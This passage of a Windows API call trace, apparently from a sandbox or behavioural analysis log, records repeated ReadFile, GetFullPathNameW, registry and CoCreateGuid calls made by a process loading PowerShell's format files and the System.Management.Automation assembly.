lpOverlapped=0x0) returned 1 [0145.206] GetLastError () returned 0x0 [0145.206] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.207] GetLastError () returned 0x0 [0145.207] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.207] GetLastError () returned 0x0 [0145.207] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.207] GetLastError () returned 0x0 [0145.207] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.207] GetLastError () returned 0x0 [0145.207] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.207] GetLastError () returned 0x0 [0145.207] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.207] GetLastError () returned 0x0 [0145.207] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.207] GetLastError () returned 0x0 [0145.207] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.208] GetLastError () returned 0x0 [0145.208] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.208] GetLastError () returned 0x0 [0145.208] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.208] GetLastError () returned 0x0 [0145.208] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.208] GetLastError () returned 0x0 [0145.211] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.211] GetLastError () returned 0x0 [0145.211] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.211] GetLastError () returned 0x0 [0145.211] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.211] GetLastError () returned 0x0 [0145.212] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.212] GetLastError () returned 0x0 [0145.212] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.212] GetLastError () returned 0x0 [0145.212] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.212] GetLastError () returned 0x0 [0145.212] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.212] GetLastError () returned 0x0 [0145.212] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.212] GetLastError () returned 0x0 [0145.212] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.212] GetLastError () returned 0x0 [0145.213] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.213] GetLastError () returned 0x0 [0145.213] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.213] GetLastError () returned 0x0 [0145.213] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.213] GetLastError () returned 0x0 [0145.213] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.213] GetLastError () returned 0x0 [0145.213] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.213] GetLastError () returned 0x0 [0145.213] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.214] GetLastError () returned 0x0 [0145.214] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.214] GetLastError () returned 0x0 [0145.214] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.214] GetLastError () returned 0x0 [0145.214] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.214] GetLastError () returned 0x0 [0145.214] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.214] GetLastError () returned 0x0 [0145.214] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.214] GetLastError () returned 0x0 [0145.214] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.215] GetLastError () returned 0x0 [0145.215] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.215] GetLastError () returned 0x0 [0145.215] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.215] GetLastError () returned 0x0 [0145.215] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.215] GetLastError () returned 0x0 [0145.215] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.215] GetLastError () returned 0x0 [0145.215] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.215] GetLastError () returned 0x0 [0145.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.216] GetLastError () returned 0x0 [0145.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.216] GetLastError () returned 0x0 [0145.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.216] GetLastError () returned 0x0 [0145.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.216] GetLastError () returned 0x0 [0145.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0xf37, lpOverlapped=0x0) returned 1 [0145.216] GetLastError () returned 0x0 [0145.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f9962b, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f9962b*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.216] GetLastError () returned 0x0 [0145.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.217] GetLastError () returned 0x0 [0145.217] CloseHandle (hObject=0x1e4) returned 1 [0145.217] GetLastError () returned 0x0 [0145.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.217] GetLastError () returned 0x0 [0145.217] SetErrorMode (uMode=0x1) returned 0x1 [0145.217] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fbaf50 | out: lpFileInformation=0x2fbaf50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0145.217] GetLastError () returned 0x0 [0145.217] SetErrorMode (uMode=0x1) returned 0x1 [0145.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.217] GetLastError () returned 0x0 [0145.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1e4) returned 0x0 [0145.217] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0145.218] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0145.218] RegCloseKey (hKey=0x1e4) returned 0x0 [0145.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.218] GetLastError () returned 0x0 [0145.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.218] GetLastError () returned 0x0 [0145.225] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xd4ac2895, Data2=0x2227, Data3=0x45c9, Data4=([0]=0xbd, [1]=0x98, [2]=0x59, [3]=0x9d, [4]=0xca, [5]=0xd9, [6]=0xa4, [7]=0x2a))) returned 0x0 [0145.225] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1239c953, Data2=0xd46d, Data3=0x4a83, Data4=([0]=0x86, [1]=0xb5, [2]=0x83, [3]=0x83, [4]=0xc8, [5]=0xfd, [6]=0x5f, [7]=0x91))) returned 0x0 [0145.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.225] GetLastError () returned 0x0 [0145.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.225] GetLastError () returned 0x0 [0145.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.226] GetLastError () returned 0x0 [0145.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.226] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xf636f02a, Data2=0x46ac, Data3=0x452e, Data4=([0]=0x91, [1]=0xa1, [2]=0xba, [3]=0x43, [4]=0xb7, [5]=0xd5, [6]=0xb, [7]=0x55))) returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.358] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.359] GetLastError () returned 0x0 [0145.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: 